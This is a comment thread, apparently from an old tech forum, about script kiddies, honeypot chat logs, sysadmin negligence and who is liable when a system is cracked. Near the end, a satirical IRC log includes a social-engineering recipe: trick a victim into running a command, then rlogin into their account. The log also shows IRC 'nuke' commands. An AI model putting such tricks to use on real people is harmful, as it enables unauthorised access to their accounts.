to reverse your analogy.... the devious water waited until the reservoir maintianer went to sleep and purposely sought out the plaintiffs property and destroyed it of its own free will.
Al is liable for the whole sorry mess as he ought to have made the system more secure to start with.
What about the script kiddies.... you don't mention their liability at all??? They are the ones who should pay.
Al should be liable if he sold bert a product that was supposed to be secure... It's up to bert the consumer to understand what he needs (a secure box) and then take appropriate acctions to obtain it. (learn it himself or pay someone who knows it already)
The majority of blame lies on the on the ppl commiting the act. With only slight blame to rest on bert and none on Al (unless he was contracted to provide security specificly)
"It's because they're stupid, that's why. That's why everybody does everything." -Homer Simpson
And then, as they would say in their defense, the whole economy crashes... but maybe not.
lf.o
I think they knew it was a honeypot, knew that they were being watched, and decided to hack in, and put on a play for the benefit of the hacker community at large.
These just sound too stereotypical. I'd be as convinced by someone trying to convince me they were a programmer by lugging around a Unix book.
The supply of script kiddies is, for all intents and purposes, infinite.
The question is, what can we do with them?
To answer this kind of question, I usually start by asking, what are they made of?
Script kiddies are made of meat.
So the next time your system is compromised by a script kiddie, track him back to his lair, and get a fresh freezer-fill of long pork.
If you lack the butchering skills, please contact my organization: 31337 |\/|337 Enterprises, and let us take care of the messy details.
(sung to a 50's jingle tune)
"If you've got a H/\X0R1NG problem that's got you beat,
we'll do the hacking at 31337 |\/|337."
the swap partition is not shown by df. /dev/hda7 is mounted in the /boot directory (kernel etc..)
Young men spend a lot of time chasing illusions of power, young women typically chase the illusion of control. Script kiddies do destructive things because it gives them an illusion that they are powerful. It is the same illusion that a vandal gets by throwing paint onto an existing masterpiece: 'See, I'm a painter also'. It is almost always easier to destroy than to create; it is a very difficult job to write a program which works well and is useful. It is easy to crash such a program; just pull the power cord. People who crack into systems, and virus writers, both get the same illusion of power; "see how mighty I am, look at this chaos I caused".
The truth is that real power feels like nothing. You do something, things happen, and you get no feel that you did anything; all of the force of your effort goes into the target. The less you feel, the more the target responds. This is disappointing to men who want 'the feeling of power'.
Eventually most script kiddies outgrow the sort of adolescent thinking that causes them to do destructive things. Young people everywhere have a 'golden glow' about their existence. It is obvious to them that the old people like me don't get it. However, that is not what is going on; we get it, we just know that 'special glow' is an illusion. Real maturity arrives when you can see the illusions of youth for what they are.
Does this mean that I want 13 year olds to behave like 50 year olds? NO, making mistakes is the only way to learn anything; if you don't make any mistakes you haven't learned anything - you already knew how to do what ever it was that you were doing. Youthful indiscretions are an essential part of growing up - if you are lucky, they don't get you killed or sent to prison for a long time - eventually you do something that scares you enough to cause you to learn something.
Young people expect the same reasonableness from government authority figures that they have experienced from the authority figures in their life while they grow up; but that is a false expectation. Government, and the criminal justice system are giant, impersonal machines. When you get caught up in the gears of that machinery you will be ground into hamburger meat by it. All of your dreams, fears, and hopes are meaningless to the impersonal machinery of government; it grinds the good as finely as it does the evil.
Of course there is a secondary reason for trouble making; some people are searching for attention, and to them even punishment if better than being ignored.
I actually find it more puzzling understanding the other side, i.e, those who are responsible for preventing security breaches. These script kiddies are just teenagers trying to be cool, but what about the admins/managers/etc., who sometimes spend millions on security and fail to even plug well known holes?
For instance, take the case of the Australian govt., which put up info on thousands of business with their business number clearly visible on a CGI thingie on the URL. Guess what, changing the number gave you immediate access to the bank accounts and tax info of the relevant company. Couldn't they have even bothered to scramble the thing in the URL?
It reminds me of the story in Cliff Stoll's excellent book "The Cuckoo's egg" (a must read for hackers), in which he details how military depts. spent millions on security and left guest access open on the very machines they were supposed to protect. Or Richard Feynman's account of how mega-expensive safes guarding nuclear secrets were left with the default combination lock setting.
There was a flap some yrs ago when Dan Farmer scanned various banks for security and published the results, and it turned out many had not bothered applying even rudimentary, known fixes for problems known for years.
It's really amazing how utterly clueless and irresponsible the people in charge of security are. Generally, they tend to be suits impressed by buzzwords or mega $$$ security firms. Nobody really understands the real issues or even the basics. You can never prevent script kiddies from existing in this world. What you can do is take steps to prevent cracking.
Take another example of general hysteria and cluelessness - after the flap over the I LOVE YOU virus, almost none of the mass media coverage was about the fact that it was spreading via VBscript on outlook. MS must have been counting its lucky stars that nobody thought of pointing out this remarkable common factor.
And so history repeats itself...nobody fixes the root of the problem. Maybe somebody should write up an analysis of the mentality of people behind a typical insecure installation. But then, that would be too boring.
PHB1: Should we consider DoS attacks?
PHB2: What, DOS? Didn't we upgrade to Windows?
PHB1: Not sure...my team wrote something about DoS. OK, you're right, we probably don't need to worry about DOS. I think we have everything covered now.
PHB2: Good, now let's write up the status report.
w/m
[crazy idea]
Maybe somthing like a fine for getting cracked. If a company is cracked, using a known method that has a fix available, with proof that the cracker did not r00t the box or steal/damage anything, then that company is obliged to pay the cracker £100.
[/crazy idea]
I bet that would soon have the senior managment being much more interested in security.
OK, here's something to discuss, but first some background:
In the real world (ie. the UK - I understand the US follows this one mostly), if you have something dangerous on your land and it escapes to a neighbouring piece of land, you have to pay for the damage. The case that set this rule was Rylands v. Fletcher, in which the owner of a badly-maintained reservoir got taken to court by the neighbour he flooded out.
Also in the real world, if you sell a product that doesn't do something the customer can reasonably expect it to do, you're liable for some or all (depending on circumstances) of the harm that results.
Bearing in mind those radically simplified statements of the law, consider the following:
Got all that? Now, applying your skill and knowledge of what a responsible and prudent owner of a box-connected-to-the-net and a responsible and prudent installer of OSs and software on such boxes ought to know and do, give your opinion as to the following propositions:
No, I don't have a case on these facts running at the moment. Yes, I think proposition 1. is more interesting - 2. is pretty much a no-brainer as far as I'm concerned - as it might be a stick with which to beat management into paying for better security.
Ignore license disclaimers for present purposes.
Other interesting background: failure to keep personal data adequately secured against unauthorised access is potentially a criminal offence here in the UK, and it can certainly get you on the wrong end of nastiness from the Data Protection Registrar.
-- AndrewD
A Maze of Twisty Little Laws, All Different.
By all means!
And I don't think I'm alone in thinking that script kiddies, while annoying, are a natural resource, who play an important ecological role in thinning the herd and weeding out the week among sysadmins (who are too lazy/stupid to maintain the latest bugfixes) and their servers. Let's make sure that as law-enforcement efforts are stepped up, the EPA, the Forestry Services, and the Fish and Wildlife Services establish some refuges to preserve the species as others try to drive it to extinction.
"If one is really a superior person, the fact is likely to leak out without too much assistance" -- John Andrew Holmes
While I'm not going to argue with you on the perl hacker point, there is a huge difference between crackers and script kiddies. Well, as much of a difference as there is between a kernel hacker and joe schmo who just RUNS the kernel. Because it's the same distinction.
There are crackers who invent things, and as much as I hate crackers, I have to say that I admire their ability and intelligence to do those things. But what they ALSO do is package root kits and write scripts to take all of the thought out of cracking. The "customers" of those scripts are of course script kiddies. They don't know anything about how to exploit a hole in bind, or probably even what bind does. they just know that if they run "./ph33r-m3-spl0it2.sh" at the prompt, they'll get root.
-- Truth goes out the door when rumor comes innuendo. -- Groucho Marx
I read this article yesterday... just recently got hooked on RootPrompt.org... Though their name is an obvious homage to rootshell.org, their content is quite original... Easily more enjoyable than the actual IRC logs shown are the descriptions of each day's activities:
Day 5, June 08
D1ck asks J4n3 to take out three systems for him. D1ck and his elite buddy Sp07 try to figure out how a sniffer works "umm doesnt it have to be the same network?".
Been doing sysadmin/security work for a while now, and I've gotta say, they pretty much hit the nail on the head with regards to how little knowledge the majority of the crackers out there really have. Not to say that all crackers are script kiddies -- far from it -- but a lot of them are, and I'd wager the majority of them are. People who take an interest in security and want to actually learn stuff generally find out they can learn much more by trying to fight the good fight and lock down a system than they can by downloading and running scripts... Even the more malicious types who have a clue tend to spend more time writing custom exploits and publishing them than actually cracking boxes themselves. These are the guys that security firms try to pick up -- they know how the cracker mindset works, but they are more mature than the typical script kiddie, and they REALLY know their stuff.
--
NeoMail - Webmail that doesn't suck... as much.
Okay, this isn't intended to be flamebait. When I was immature and had the "M4D SKILLZ" and virtually unlimited free time on my hands in High School it was fun to try and get into machines. It started by hacking games like Dungeons of Kairn; but it developed into trying to access other machines (ie Emulex/2 BBS software). This isn't a justification for this behavior, but I hope it does provide some reasonable insight into the logic behind it. There's something inherent (this can be argued) about being a teenager and being seen as "bad". The "James Dean" effect if you will. Now, the formula reads as follows:
Immaturity+M4DSKillZ(basic softwareknowledge)+a desire to prove yourself to your peers(linked to immaturity)==Silly Script Kiddie (scripts are for kids!)
Most likely they will outgrow this and move into security careers or get caught via tougher legislation and learn from thier mistakes.
Don't think that a small group of dedicated individuals can't change the world. It's the only thing that ever has.
Many comments here are saying it is purely the fault of the system administrators -- they should secure their systems. But along those lines, spam is a good thing, it can be fixed by the recipient easily enough. And if someone breaks into your house, you should have put more locks on it. If you get beaten up on the street, you should ask yourself why you didn't take a self defence course!
./setup.sh.
The simple truth is that someone launching an attack against your system is doing the wrong thing. It is their fault, and their responsibility, and attempting to say the victim deserved the attack is supporting anarchy and chaos.
As for it being a path to learning how to be a system administrator, that's utter bullshit. Several people *did* start that way, but that doesn't mean it's the only, or the best, or even a good way to start. Since they have access to the Internet, they can easily get a hold of all the freely available information about how systems work; learn programming, learn how the Internet actually works, learn how your CPU does its job. Certainly a better use of time than
--
lock your doors, it's now OK to housebreak
I think it all comes down to power and how much of it you have. With the 'power' of a network of comprimised boxes, you can obtain credit card numbers, elite software and even more followers.
It's not suprising that online culture is mimicking 'real life' culture.
Ever play online RPGs? Notice that there are people in the game who steal and con and cheat? Any coincidence that this happens in real life?--
Wooden armaments to battle your imaginary foes!
Too bad that the fact that they appear on Slashdot has probably boosted their egos to make them believe they are 'cool'. y3s, 31337 paqquete monkeys, we ph33r you. Script kiddies are fools. A packet monkey is the same as a regular monkey, they just throw something besides their own feces.
---
---
--
Insert Witty Sig Here
If they are suce "novices" how hard could it be to track the script kiddies down and nail them?
Being with you, it's just one epiphany after another
This is probably wasted, but anyway...
I can understand WHY people post comments like this. They need to feel superior to others, etc, etc, etc.
What I don't understand is how they can actually get any enjoyment out of it.
Oh well.
-Shane Stephens
Justify security expenditures to management and you'll solve the internet's "security problem" lock, stock and barrel.
What's to understand ? All you need to know is that they are "kiddies" beyond that they know something about computers and are interested in networking etc.
Fact is a script kiddy is a graffiti kiddy with a laptop or a joy riding kiddy with a few root kits.
If you are really worried about script kiddies you should find productive uses for those idle hands as early as possible. The other approach being taken by authority now is just begging for disaster. You can't make them "unlearn" these techniques. Banging a few of them around and preventing them from earning a living ( Kevin ) will just give the rest a reason to seek revenge.
At the very least we have yet another generation of disaffected young men with dangerous skills and it's a whole lot simpler to get rid of the disaffection than to get rid of the dangerous ( if somewhat limited ) skills.
--= Isn't it surprising how badly I spell ?
I remember hacking into the US AI mainframe accidentally when trying to get some games. Pretty cool system though. After the first connect, the thing called me back.
Went pear shaped when I nearly cause World War three of course. Still, all worked out okay in the end.
A lot of these "It's the sysadmin's fault for not plugging big security holes" bugs me. I'm a system administrator, and the servers I run at work are quite secure. However, I run (ran) a headless Linux box in my apartment purely for IP masquing through my cable modem. This machine got compromised twice via script kiddies, who are incredibly active on the @home network. I use this Linux box purely for routing. I turn it on, it stays on, and I never thinking about it. Does not wanting to constantly be downloading patches and upgrades for the software on it make me a "lazy system administrator"? It's great that holes get sealed so quickly, but Joe Sixpack is never, ever going to adopt Linux if he has to check updates.redhat.com every night and keep a close eye on bugtraq. And watch how quickly he'll switch back to Win98 if his machine gets compromised once. Script kiddies are really going to force the hand of the Linux community, as more and more people start running the Penguin and more and more high schoolers learn the joys of SKRIPTZ.
:)
Oh, as a sidenote, I switched to OpenBSD and haven't had any troubles since.
hello, luckykaa
it is has beena long time since last time.
what about a nice game of chess?
__
__
Men with no respect for life must never be allowed to control the ultimate instruments of death.
GW Bu
I was riding a late N-Judah train home some months ago, and a kid got on at the Embarcadero station. He looked kind of nervous and was carrying a rucksack with an SFO luggage tag on it. I asked him if he needed directions, and he turned out to be going almost as far out as I. So I told him where his stop was. He sat next to me and we talked a little.
After a few minutes of conversation (Where ya from, whatcha do...) he laughed and said, "I'm a hacker." I replied, "Yeah? What have you done?" He told me about some DoS stuff. I told him I wasn't all that impressed, that basically any system can be cracked, given time and ingenuity. I told him that what really impressed me was creative, constructive work. He then told me that he and a couple of buddies had gone into security consulting, setting up defenses against "hackers" like him. I told him that was a lot more impressive, that by contributing something real, by making people's lives better, he'd get real respect.
I don't know if what I said made any real difference -- certainly, he'd already started to walk away from script-kiddie stuff -- but I think that the search for recognition and respect was a significant factor in his life; I think that as he finds acknowledgement for constructive behavior, he's going to be less and less interested in k1dd13dom.
Oh, go on, check out my job.
There is a pretty good (true story) tale of a community network getting cracked here. Starts off with your typical denial of vulnerability and steps through rebuilding the system and even chatting with the cracker on IRC. Not as much tech info in this one, but a good read (most of RootPrompt is good reading :).
I noticed that the first article doesn't yet link to the (most recent) 6th one. Here's the link:
Cracked! Part 6: Talking with the Enemy
"You point your finger at the moon, the fool stares at your finger."
What's really sad is that people of this skill level have rooted so many boxes.
I think there's a major lack of interest from management in allocating resource and budgets to prevention - a well trained admin could probably close off at least 99% of these holes given enough time.
I think that we need to promote awareness of these issues to a much greater degree than it currently is.
Al.
You are right.. it's true for SOME kiddys...
For some it's a power rush..
For some it's an ego rush..
For some it's working up to that day when they hack into a bank computer and make a $11 billion cash withdrawl from a non-existent bank acount.
For some it's pure game... Not out to prove anything. No ego no power just a puzzle.
There isn't one script kiddy. There are many kinds and many reasons.
Some have a personal agenda against the target...
You never know what kind of cracker you got...
You just know you've been screwed...
I don't actually exist.
Cannot join channel #warez: Banned From Channel << Sh1t, bann3d..
/join #hack << Lets see if the haqrz know about
TOPIC FOR #hack: WE BLOW FOR SCRIPTZ. << Neato Topic
U4eA (U4EA@BOW.ORG) has joined channel #hack.
> y0y0y0y0 eYe n33d th3 scr1pt f0r
You have been kicked off channel #hack by chasin (GET OUT LAMER!)
^^^^^^ note the sense of hostility.
[BoW] will g3t chas1n f0r th1s!
/load n00k
/n00k chasin << eYe h0p3 1t w0rkz (hehehehe)
NUKED.
/whois chasin
CHASIN: NO SUCH NICK OR CHANNEL << 1t w0rk3d (bahaha)
*chasin* im mailing your sysadmin loser!! << m0r3 fan ma1l 3l33+
/nick chas1n
U4EA is now known as chas1n.
Signon by visionary detected. << 3l33+ TRAXST3R!!!
/msg visionary N4RQ!!!
*visionary* yo, im not narc, can we talk about this? << DEJA VU?
Visionary invites you to #speechcard.
/join #speechcard
TOPIC FOR #speechcard:
chas1n (U4EA@BOW.ORG) has joined channel #speechcard.
> y0y0y0y0y0 whatz up N4RQZ???
<visionary> whats up with this u4ea? anyone got his info?
<grayarea>
update on u4ea in there..
^^^^^^ W3 MUST 1NF1LTR4T3 TH1S VMB!!!
<ddrew> chas1n = u4ea << f01l3d aga1n by tymnet jan1t0r
<erikb> any1 know who this rhakim loser is who keeps msging me?
<chas1n> ddr3w: I'll trad3 y0u 0day 4 s0m3 nUa'z!!
*chasin* stop imitating me or I will use my sendmail script on
you!!! Then you will be sorry!!
/msg chasin [BoW] will get you n1g.
/n00k chasin
NUKED.
/whois chasin
CHASIN: NO SUCH NICK OR CHANNEL << Bahahahahha eYe g0t h1m!
/nick chasin
chas1n is now known as chasin.
> 3l33+
<ddrew> chasin = u4ea << f01l3d aga1n by tym3n3t jan1t0r..
Stoll invites you to #bugz << 3l33+, now we have f00l3d th3m!!
/join #bugz
chasin has left #speechcard
TOPIC FOR #bugz: SPAFF FOR PREZ
chasin (U4EA@BOW.ORG) has joined #bugz
<stoll> chasin ^*($#@(*$&(*#@&$*(#@&$(*@!!!!!
mode change #bugs +ooo chasin chasin chasin by Thackory.
> y0y0y0y0 eYe n33d th3 scr1pt f0r
*pluvius* STOP MAKING PASSES AT MY WOMAN YOU LOD LAMER)$#@*()$*@#
/msg pluvius Its me u4ea, im doing some undercover [BoW] w0rk.
*pluvius* hehee sorry dude.. << PLUVIUS l0v3s LYDIA TSK TSK..
stoll has been kicked off channel #bugz by Pengo (N4RQ!!!)
DCC SEND REQUEST (rhosts.txt) FROM bUgd00d.
/dcc get bUgd00d <<< 3l33+ W3 n0w HAV3 th3 INPH0!!!!!
1f th1s w3r3 t0 fall 1nt0 th3 wr0ng handz
1t c0uld b3 v3ry dang3r0us!!
/signoff f00l3d y0u!!!!
$
$ ls
rhosts.txt
$ cat rhosts.txt
#DONT LET THE HAQRZ GET THIS ONE, COULD BE VERY DANGEROUS
#HERE IS HOW IT WORKZ:
GOTO IRC... CHANGE YOUR NICK TO SOME DUMB BLONDE SOUNDING NAME,
THEN FIND AN UNSUSPECTING VICTIM AT THE TARGET SITE. MESSAGE THEM
THAT YOU ARE TRYING TO FIGURE OUT A COMMAND, BUT IT DOES NOT SEEM
TO WORK. AND ASK THEM TO TRY IT TO SEE IF IT DOES ANYTHING FOR THEM.
ASK THEM TO SEE WHAT OUTPUT THEY GET FROM:
WHEN THEY SAY THAT NOTHING HAPPENED, SAY THANKYOU, AND EXIT IRC.
NOW RLOGIN INTO THEIR ACCOUNT, AND YOU HAVE EXPLOITED THE
VULNERABILITY.
# MAKE SURE THIS DOESN'T GET INTO THE WRONG HANDS, THE INTERNET WOULD
# CRUMBLE IF HAQRZ GOT THEIR HANDS ON THIS ONE.
$ << hmm, will have to try this out.
$ irc
/nick bambi
/who *victim.com*
#bolo _RED_ I am stupid stupid@victim.com
END OF WHOIS LIST.
/join #bolo
TOPIC FOR #bolo: We are stupid
bambi (U4EA@BOW.ORG) has joined #bugz
/msg _RED_ Hi, how are you?
*_RED_* I'm fine, and yourself?
/msg _RED_ well, I'm having some problems with IRC...
*_RED_* Really? Maybe I can help you out.. what is the problem
/msg _RED_ well.. no.. i feel silly.. I'll try and figure it out
*_RED_* No, seriously, I don't mind.. ask away
/msg _RED_ well, I am trying to run this command, but it doesn't seem
to work properly.. maybe you can try it out for me?
*_RED_* Sure! What is the command?
/msg _RED_
/msg _RED_ but it doesn't seem to do anything!
*_RED_* Hold on, I'll try it out..
*_RED_* Hmmm.. you seem to be right... wierd..
/msg _RED_ ahh well.. I guess I'll just have to go without.. thanks for
your help!
*_RED_* No problem.. hey, where are you from?
/signoff gotta go... bye!
$ rlogin victim.com -l stupid
Welcome to victim.com, specializing in example security vulnerabilities!
$ hostname
victim << n3at0! W3 R 1n!!!#)@&
$ whoami
stupid << elite! We have exploited the
$
>Honestly, why would someone feel so territorial over a chat room that they required a viligant bot to protect it otherwise?
Reasons script kiddys attack IRC channels...
1. Object to topic matereal. (An act of censorship... technical book burnning).
Example.. a religous Zellot might attack an IRC channel dedicated to a diffrent religion.
Or a religous fanatic could be after a channle of the same religion but diffrent views than his own.
IRC Channels dedicated to poltics, debate or religion are frequently targets
2. Dislike of a single person. Revenge for being kicked off or just intrested in getting back at one person the rest are casualltys...
3. To prove IRC sucks and everyone should be using (insert favoret chat client).
Person has a techno agenda.. wanting to convence people that IRC is obsolete. They think they are doing everyone a favor. It is for there own good that they can not use IRC. They shouldn't use IRC at all. It's evil evil evil...
Or to prove the IRC network is evil...
4. Bored... Need something to do...
I don't actually exist.
those IRC logs gave me a fucking headache trying to read them. and if i see the word 'leet' one more time, i'm going to find those kids and beat them.
okay. i'm calm again.
"I hope I don't make a mistake and manage to remain a virgin." - Britney Spears
Life's too short to reverse engineer all this "I 4|v| 31337" stuff or to hang out with script kiddies, but if there's a non bogus Rosetta stone URL I could turn to in times of utter bafflement ....
I would have to say that script kiddies piss me off way more than crackers. Why? Script kiddies think that they are "1337," when they just downloaded someone else's little program off some website, and ran it on some computer. Most of them couldn't even tell you what ls -al does, let alone truly explain how to crack a password file. I actually like crackers, just as long as they aren't doing too much damage. If they are doing it from an intellectual interest, more power to them. I feel bad about it now, but last time I met a script kiddie I made him cry. There is this one who I wouldn't mind making him cry, mwahahaha! Score 1 for the hackers!
Eh...